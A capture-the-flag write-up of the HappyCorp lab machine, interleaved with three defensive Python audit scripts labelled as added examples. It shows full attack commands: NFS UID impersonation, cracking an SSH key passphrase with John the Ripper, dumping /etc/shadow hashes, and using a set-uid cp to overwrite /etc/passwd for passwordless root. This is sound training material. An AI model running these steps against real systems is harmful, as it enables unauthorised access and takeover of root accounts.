happycorp john - danielcastropalomares/security GitHub Wiki
With a first scan we find the following open ports:
root@kali:~# nmap -p- 172.31.255.105
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-05-19 19:14 CEST
Nmap scan report for 172.31.255.105
Host is up (0.00016s latency).
Not shown: 65527 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
2049/tcp open nfs
35767/tcp open unknown
39189/tcp open unknown
44537/tcp open unknown
48555/tcp open unknown
MAC Address: 6C:40:08:BB:1C:56 (Apple)
Nmap done: 1 IP address (1 host up) scanned in 13.78 seconds
root@kali:~#
root@kali:~# nmap -A 172.31.255.105
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-05-19 19:15 CEST
Nmap scan report for 172.31.255.105
Host is up (0.00034s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/admin.php
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Happycorp
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/udp nfs
| 100005 1,2,3 44537/tcp mountd
| 100005 1,2,3 57024/udp mountd
| 100021 1,3,4 37935/udp nlockmgr
| 100021 1,3,4 39189/tcp nlockmgr
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
MAC Address: 6C:40:08:BB:1C:56 (Apple)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.34 ms 172.31.255.105
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds
With nikto we find the following:
root@kali:~# nikto --host 172.31.255.105
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.31.255.105
+ Target Hostname: 172.31.255.105
+ Target Port: 80
+ Start Time: 2019-05-19 19:19:57 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x8825 0x58340bcff7e6c
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Cookie PHPSESSID created without the httponly flag
+ Entry '/admin.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3092: /admin.php: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /lib/: Directory indexing found.
+ OSVDB-3092: /lib/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
With Osmedeus:
[19:20:22] 200 - 469B - /admin.php
[19:20:35] 301 - 314B - /css -> http://172.31.255.105/css/
[19:20:37] 301 - 314B - /img -> http://172.31.255.105/img/
[19:20:37] 200 - 34KB - /index.html
[19:20:38] 301 - 314B - /lib -> http://172.31.255.105/lib/
[19:20:38] 200 - 626B - /manual/index.html
[19:20:38] 301 - 317B - /manual -> http://172.31.255.105/manual/
In the source of the admin.php page:
root@kali:~# curl http://172.31.255.105/admin.php
<link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">
<center><br />
<h2>Happycorp Super Secure login</h2>
<br />
<form method="POST" action="">
<label>Username:</label><input type="text" name="user" value=""><br />
<label>Password:</label><input type="password" name="pass" value=""><br />
<input type="submit" value="Login">
<!-- That computer thingy about db and such doesn't work so I just hard coded it - Rodney -->
</form></div>
With the user heather we get the error "Invalid password", so this user exists:
http://172.31.255.105/admin.php
Happycorp Super Secure login
Invalid password
Username:
Password:
Login
We check NFS and see that the home directory of the user karl is being shared:
root@kali:~# showmount -e 172.31.255.105
Export list for 172.31.255.105:
/home/karl *
We mount karl's home directory on /mnt/:
We list the directory:
root@kali:/mnt# ls -liath
total 28K
918344 drwxr-xr-x 3 1001 1001 4,0K mar 5 11:15 .
918347 -rw-r--r-- 1 1001 1001 3,5K mar 5 11:15 .bashrc
918200 lrwxrwxrwx 1 root root 9 mar 5 11:11 .bash_history -> /dev/null
918351 drwx------ 2 1001 1001 4,0K mar 5 11:10 .ssh
918199 -rw------- 1 1001 1001 28 mar 5 02:55 .lesshst
918348 -rw-r--r-- 1 1001 1001 220 mar 4 22:09 .bash_logout
918345 -rw-r--r-- 1 1001 1001 675 mar 4 22:09 .profile
2 drwxr-xr-x 18 root root 4,0K dic 3 21:24 ..
Since only the user with UID 1001 can access .ssh, we create the user karl with UID 1001 on our own machine:
root@kali:~# adduser karl --uid 1001
Adding user `karl' ...
Adding new group `karl' (1001) ...
Adding new user `karl' (1001) with group `karl' ...
Creating home directory `/home/karl' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for karl
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n]
Now the permissions are shown correctly:
root@kali:/mnt# ls -liath
total 28K
918344 drwxr-xr-x 3 karl karl 4,0K mar 5 11:15 .
918347 -rw-r--r-- 1 karl karl 3,5K mar 5 11:15 .bashrc
918200 lrwxrwxrwx 1 root root 9 mar 5 11:11 .bash_history -> /dev/null
918351 drwx------ 2 karl karl 4,0K mar 5 11:10 .ssh
918199 -rw------- 1 karl karl 28 mar 5 02:55 .lesshst
918348 -rw-r--r-- 1 karl karl 220 mar 4 22:09 .bash_logout
918345 -rw-r--r-- 1 karl karl 675 mar 4 22:09 .profile
2 drwxr-xr-x 18 root root 4,0K dic 3 21:24 ..
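The foothold above works because NFSv3 with AUTH_SYS trusts whatever UID the client presents, so an export to `*` without `all_squash` lets any host on the network impersonate uid 1001. The following check is an added example, not part of the original writeup: it parses an /etc/exports file (a constructed sample here) and flags exports with that property.

```python
# Constructed sample /etc/exports, not copied from the target. The first line
# reproduces the export showmount reported above ("/home/karl *"); the second
# is a hardened export for contrast.
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/home/karl *(rw,sync,no_subtree_check)
/srv/share 192.168.1.0/24(ro,sync,root_squash,all_squash,anonuid=65534,anongid=65534)
"""

def parse_exports(text):
    """Yield (path, client, options) for each client of each export line."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for tok in clients:
            client, _, opts = tok.partition("(")
            yield path, client, set(filter(None, opts.rstrip(")").split(",")))

def audit_exports(text):
    """Return {path: [findings]} for exports that trust client-supplied UIDs."""
    report = {}
    for path, client, opts in parse_exports(text):
        issues = report.setdefault(path, [])
        if client.startswith("*"):
            issues.append(f"exported to any host ({client})")
        if "all_squash" not in opts:
            # AUTH_SYS trusts the UID the client sends; without all_squash a
            # client that creates a local user with uid 1001 is karl on the share.
            issues.append("no all_squash: client-chosen UIDs map to local users")
        if "no_root_squash" in opts:
            issues.append("no_root_squash: remote root is root on the export")
        if path.startswith("/home"):
            issues.append("home directory exported: .ssh keys and rc files reachable")
    return {p: i for p, i in report.items() if i}
```

On a real host feed it open("/etc/exports").read(); the fix is to restrict the client list and add all_squash so remote UIDs are mapped to the anonymous user instead of to local accounts.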
We switch to karl and enter the .ssh directory:
root@kali:~# su - karl
karl@kali:~$
karl@kali:~$ cd /mnt/
karl@kali:/mnt$ ls
karl@kali:/mnt$ ls -liath
total 28K
918344 drwxr-xr-x 3 karl karl 4.0K Mar 5 11:15 .
918347 -rw-r--r-- 1 karl karl 3.5K Mar 5 11:15 .bashrc
918200 lrwxrwxrwx 1 root root 9 Mar 5 11:11 .bash_history -> /dev/null
918351 drwx------ 2 karl karl 4.0K Mar 5 11:10 .ssh
918199 -rw------- 1 karl karl 28 Mar 5 02:55 .lesshst
918348 -rw-r--r-- 1 karl karl 220 Mar 4 22:09 .bash_logout
918345 -rw-r--r-- 1 karl karl 675 Mar 4 22:09 .profile
2 drwxr-xr-x 18 root root 4.0K Dec 3 21:24 ..
karl@kali:/mnt$ cd .ssh/
karl@kali:/mnt/.ssh$
We find the first flag:
karl@kali:/mnt/.ssh$ cat user.txt
flag1{Z29vZGJveQ}
The SSH key inside authorized_keys is the same as the user karl's own public key:
karl@kali:/mnt/.ssh$ cat authorized_keys
ssh-rsa ... karl@happycorp
karl@kali:/mnt/.ssh$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDNiAQUpuxbe7Urm0OHSwVJqx0xSTApeX+e6YcNE1Yv0EWPQsDu3d737H0dIhG/l3ftjGbFLshiXkQkdPun96Y0V6CXm7YtAOI2ga1M83ApRDzFsCvSteXBECZHHhACB7gjdidrW6aohTlqZCcEkyEOEb2Mt8nHTA+dfmaRwqJl1nMzO5l4cTg/rN3TiMwAa+lyjjjxJ0v2tvRde+VOafunF+/vYrafhtgg3ECMxp9SSnD4NxU0fhX9eYdTcZkFb17Py5Bi8aZ4dWkuUrSIAIBXyF5voHIrZcOywmdauHhwbIWagqblvHtTjpoqzunRH6nicSZGEFsilQ943HOPSigyi6bKx+vK9aj+o4JsnMX3qyz1F0M7Nrzdc4rF1PZ2ViIl7PnhmwIFOpjRRcu/N+WB93gU9d4A6S/s2z+mkIghTme24IqPylZD9Rpol08je+KLXvtSg/Ypojruz6/zSl2FYVd9i53Sm3afp9P1OHQWllCVLv+xxiCI/c2r/bK9lE15vhzaSvaRrXchOX0Hnt0oiBXsIC/TMFzNwsy8RMzLpaxoHIK76CN8fPVulX+VmD7xqx6hQqS9fPsJTKikJjLz5laqLHbhHpaChSl/5PHZuafI3Li2QjUEt+RvyBAVUuGzRT8dwGOLDBB2+FK4Slu65AGkDfkDm9C1/9K8dGVm7Q== karl@happycorp
The problem is that the private key is encrypted:
karl@kali:/mnt/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,A6E2D064459881EDB840A03CF87FC98C
We try brute force with John the Ripper and find that the passphrase is sheep:
root@kali:/tmp/ssh# ssh2john id_rsa > id_rsa.hash
root@kali:/tmp/ssh# john -wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
sheep (id_rsa)
1g 0:00:00:00 DONE (2019-05-19 19:57) 14.28g/s 230742p/s 230742c/s 230742C/s sheep
Use the "--show" option to display all of the cracked passwords reliably
Session completed
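The passphrase fell at over 200k guesses per second because the legacy PEM container ("Proc-Type: 4,ENCRYPTED" plus a DEK-Info line) derives the cipher key with a single MD5 pass over the passphrase, so the passphrase's strength is the only protection; the newer OpenSSH container uses bcrypt with a configurable round count. The classifier below is an added example, not part of the original writeup: it reads both container formats and reports the KDF, using the key header captured above and a constructed new-format stub as inputs.

```python
import base64
import struct

def _sshstr(b):  # SSH wire string: uint32 length + data
    return struct.pack(">I", len(b)) + b

def _read_sshstr(buf, off):
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n

def classify_key(text):
    """Describe how a private key file protects its passphrase."""
    lines = [l.strip() for l in text.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(l for l in lines[1:] if not l.startswith("-----")))
        if not blob.startswith(b"openssh-key-v1\0"):
            raise ValueError("bad openssh-key-v1 magic")
        cipher, off = _read_sshstr(blob, 15)      # ciphername follows the magic
        kdf, off = _read_sshstr(blob, off)
        kdfopts, off = _read_sshstr(blob, off)
        rounds = None
        if kdf == b"bcrypt":                      # kdfoptions = string salt, uint32 rounds
            _salt, o = _read_sshstr(kdfopts, 0)
            (rounds,) = struct.unpack_from(">I", kdfopts, o)
        enc = cipher != b"none"
        return {"format": "openssh", "encrypted": enc, "kdf": kdf.decode(),
                "rounds": rounds, "weak_kdf": enc and (kdf != b"bcrypt" or rounds < 16)}
    # Legacy PEM: Proc-Type 4,ENCRYPTED + DEK-Info means OpenSSL EVP_BytesToKey, one MD5 pass.
    hdr = dict(l.split(": ", 1) for l in lines[1:] if ": " in l)
    enc = hdr.get("Proc-Type") == "4,ENCRYPTED"
    return {"format": "pem", "encrypted": enc, "kdf": "EVP_BytesToKey(MD5)" if enc else "none",
            "rounds": 1 if enc else None, "weak_kdf": enc}

# Header of the key found on the share (body omitted, so this is not a usable key).
LEGACY_SAMPLE = """\
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,A6E2D064459881EDB840A03CF87FC98C

(key body omitted)
-----END RSA PRIVATE KEY-----
"""

# Constructed stand-in for a key written by `ssh-keygen -o -a 16`: only the header
# fields the parser reads, not a usable key.
_blob = (b"openssh-key-v1\0" + _sshstr(b"aes256-ctr") + _sshstr(b"bcrypt")
         + _sshstr(_sshstr(b"\0" * 16) + struct.pack(">I", 16)) + struct.pack(">I", 1))
NEW_FORMAT_SAMPLE = ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(_blob).decode()
                     + "\n-----END OPENSSH PRIVATE KEY-----\n")
```

Re-wrapping an existing key with `ssh-keygen -p -o -a 64 -f id_rsa` moves it to the bcrypt-protected container; the unencrypted case is a separate finding and is not flagged as weak_kdf here.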
Now we can log in over SSH:
karl@kali:/mnt/.ssh$ ssh -i id_rsa karl@172.31.255.105
Enter passphrase for key 'id_rsa':
Linux happycorp 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Mar 5 05:10:07 2019 from 192.168.207.129
rbash: warning: shell level (1000) too high, resetting to 1
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
ls
rbash: fork: Resource temporarily unavailable
karl@happycorp:~$
karl@happycorp:~$
karl@happycorp:~$ ls
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
The problem we run into right after logging in is that a multitude of shells seem to be opened and the system runs out of memory. If we check the .bashrc file we find /bin/rbash. We comment out that line and try logging in again:
karl@happycorp:~$ cat .bashrc
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
case $- in
*i*) ;;
*) return;;
esac
#/bin/rbash
Now it works without problems:
root@kali:/tmp/ssh# ssh -i id_rsa karl@172.31.255.105
Enter passphrase for key 'id_rsa':
Linux happycorp 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun May 19 14:04:25 2019 from 172.31.255.129
karl@happycorp:~$
karl@happycorp:~$
We check the cron directories, but find nothing out of the ordinary:
karl@happycorp:~$ ls -liath /etc/cron*
655584 -rw-r--r-- 1 root root 722 Oct 7 2017 /etc/crontab
/etc/cron.d:
total 16K
655361 drwxr-xr-x 78 root root 4.0K May 19 14:08 ..
655575 drwxr-xr-x 2 root root 4.0K Mar 4 03:45 .
655576 -rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
655448 -rw-r--r-- 1 root root 712 Jan 1 2017 php
/etc/cron.daily:
total 40K
655361 drwxr-xr-x 78 root root 4.0K May 19 14:08 ..
655382 drwxr-xr-x 2 root root 4.0K Mar 4 03:31 .
655568 -rwxr-xr-x 1 root root 1.5K Jan 18 05:42 apt-compat
655968 -rwxr-xr-x 1 root root 539 Nov 3 2018 apache2
655383 -rwxr-xr-x 1 root root 1.6K Jun 25 2018 dpkg
655577 -rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
655430 -rwxr-xr-x 1 root root 249 May 17 2017 passwd
655798 -rwxr-xr-x 1 root root 1.1K Dec 13 2016 man-db
655554 -rwxr-xr-x 1 root root 355 Oct 25 2016 bsdmainutils
655628 -rwxr-xr-x 1 root root 89 May 5 2015 logrotate
/etc/cron.weekly:
total 16K
655361 drwxr-xr-x 78 root root 4.0K May 19 14:08 ..
655582 drwxr-xr-x 2 root root 4.0K Mar 4 03:31 .
655583 -rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
655799 -rwxr-xr-x 1 root root 723 Dec 13 2016 man-db
/etc/cron.monthly:
total 12K
655361 drwxr-xr-x 78 root root 4.0K May 19 14:08 ..
655580 drwxr-xr-x 2 root root 4.0K Mar 4 03:28 .
655581 -rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
/etc/cron.hourly:
total 12K
655361 drwxr-xr-x 78 root root 4.0K May 19 14:08 ..
655578 drwxr-xr-x 2 root root 4.0K Mar 4 03:28 .
655579 -rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
In ps aux we find no interesting process. We look for files with the SUID bit set and find the cp binary:
karl@happycorp:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/sbin/mount.nfs
/bin/mount
/bin/ping
/bin/cp
/bin/umount
/bin/su
karl@happycorp:~$ ls -liath /bin/cp
131216 -rwsr-xr-x 1 root root 128K Feb 22 2017 /bin/cp
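A set-uid copy of cp lets any local user overwrite any file as root, which is the whole privilege escalation that follows; the defensive counterpart is to inventory set-uid files and diff them against a known-good baseline. The script below is an added example, not the writeup's own code: it parses `ls -li` lines in the format shown above (the /bin/cp line captured on the target plus constructed entries) and flags any set-uid or set-gid file outside the baseline, which is itself an assumed list for a stock Debian 9 install.

```python
import os
import stat

# Assumed baseline: set-uid files a stock Debian 9 install ships with (build
# yours from a known-good image rather than trusting this list).
BASELINE = {
    "/usr/bin/newgrp", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/passwd",
    "/usr/bin/chsh", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/lib/openssh/ssh-keysign",
    "/sbin/mount.nfs", "/bin/mount", "/bin/ping", "/bin/umount", "/bin/su",
}

# `ls -li` lines: /bin/cp is the line captured on the target above, the rest
# are constructed entries for contrast.
SAMPLE_LISTING = """\
131216 -rwsr-xr-x 1 root root 128K Feb 22 2017 /bin/cp
131220 -rwsr-xr-x 1 root root 40K May 17 2017 /bin/su
131230 -rwxr-xr-x 1 root root 123K Feb 22 2017 /bin/ls
131240 -rwxr-sr-x 1 root tty 31K Feb 22 2017 /usr/bin/wall
"""

def parse_ls_line(line):
    """Return (path, owner, setuid, setgid) from one `ls -li` line."""
    _ino, mode, _n, owner, _grp, _size, _mon, _day, _time, path = line.split(None, 9)
    return path, owner, mode[3] in "sS", mode[6] in "sS"

def unexpected_setuid(listing, baseline=BASELINE):
    """Set-uid/set-gid files in an ls listing that are not on the baseline."""
    hits = []
    for line in listing.splitlines():
        if line.strip():
            path, owner, suid, sgid = parse_ls_line(line)
            if (suid or sgid) and path not in baseline:
                hits.append((path, owner, "setuid" if suid else "setgid"))
    return hits

def scan_setuid(root="/", baseline=BASELINE):
    """Same check on a live filesystem (for cron/CI); symlinks are not followed."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found.append(p)
    return sorted(p for p in found if p not in baseline)
```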
For example, we can copy the shadow file:
karl@happycorp:~$ cp /etc/shadow /tmp/
karl@happycorp:~$
karl@happycorp:~$ cat /tmp/shadow
root:$6$WagaBS05$3dmSGltBbONiMHGd353CH8MIpWphIm1mF3HYvL3lLk752ERIPsq5aecGTi.5/UQ6Ni5UvpTR4F10BPZBOSMru/:17960:0:99999:7:::
daemon:*:17959:0:99999:7:::
bin:*:17959:0:99999:7:::
sys:*:17959:0:99999:7:::
sync:*:17959:0:99999:7:::
games:*:17959:0:99999:7:::
man:*:17959:0:99999:7:::
lp:*:17959:0:99999:7:::
mail:*:17959:0:99999:7:::
news:*:17959:0:99999:7:::
uucp:*:17959:0:99999:7:::
proxy:*:17959:0:99999:7:::
www-data:*:17959:0:99999:7:::
backup:*:17959:0:99999:7:::
list:*:17959:0:99999:7:::
irc:*:17959:0:99999:7:::
gnats:*:17959:0:99999:7:::
nobody:*:17959:0:99999:7:::
systemd-timesync:*:17959:0:99999:7:::
systemd-network:*:17959:0:99999:7:::
systemd-resolve:*:17959:0:99999:7:::
systemd-bus-proxy:*:17959:0:99999:7:::
_apt:*:17959:0:99999:7:::
messagebus:*:17959:0:99999:7:::
sshd:*:17959:0:99999:7:::
karl:$6$5K/tvCeV$kdQ9dg5e9dw/b4CZG94k7Jtd/W481ycVfuRhnRktf4qW.txc446j91HtGFOh26vy1zNgKJHgzke77xNpRecHZ/:17959:0:99999:7:::
statd:*:17960:0:99999:7:::
We try to crack the hash with john, without success:
root@kali:/tmp/happycorp# john -wordlist=/usr/share/wordlists/rockyou.txt mypasswd
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
What we will do is edit the passwd file so that it does not ask for a password when switching to the root user; to do that we replace the root line:
root:x:0:0:root:/root:/bin/bash
with this one:
root::0:0:root:/root:/bin/bash
LFILE=/etc/passwd
TF=$(mktemp)
echo "root::0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
karl:x:1001:1001:,,,:/home/karl:/bin/bash
statd:x:107:65534::/var/lib/nfs:/bin/false" > $TF
./cp $TF $LFILE
Now if we try to switch to root with su:
karl@happycorp:~$ su - root
root@happycorp:~#